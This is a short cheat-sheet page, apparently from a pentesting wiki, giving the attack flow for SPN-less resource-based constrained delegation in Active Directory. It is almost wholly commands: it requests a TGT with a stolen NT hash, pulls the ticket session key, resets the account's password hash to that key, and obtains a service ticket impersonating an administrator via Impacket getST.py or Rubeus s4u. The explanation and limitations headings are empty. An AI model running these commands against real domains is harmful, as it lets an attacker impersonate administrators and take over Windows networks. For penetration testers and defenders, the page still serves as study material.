SPN-less RBCD
Attack Flow
getTGT.py -hashes :[NT_HASH_SPNLESS] [DOMAIN]/spnless@[DC_IP]
describeTicket.py spnless.ccache | grep 'Ticket Session Key'
Ticket Session Key: [TGT_SESSION_KEY_AS_HASH]changepasswd.py [DOMAIN]/spnless:[OLD_PASS]@[DC_IP] -newhash [TGT_SESSION_KEY_AS_HASH]KRB5CCNAME=spnless.ccache getST.py -u2u -impersonate [ADMIN_USER] -spn host/[BACKEND_SERVER_1] -k -no-pass [DOMAIN]/spnlessPS > .\Rubeus.exe s4u /u2u /user:spnless /rc4:[TGT_SESSION_KEY_AS_HASH] /impersonateuser:[ADMIN_USER] /msdsspn:host/[BACKEND_SERVER_1] /ptt
Why does this work?
Limitations
Última actualización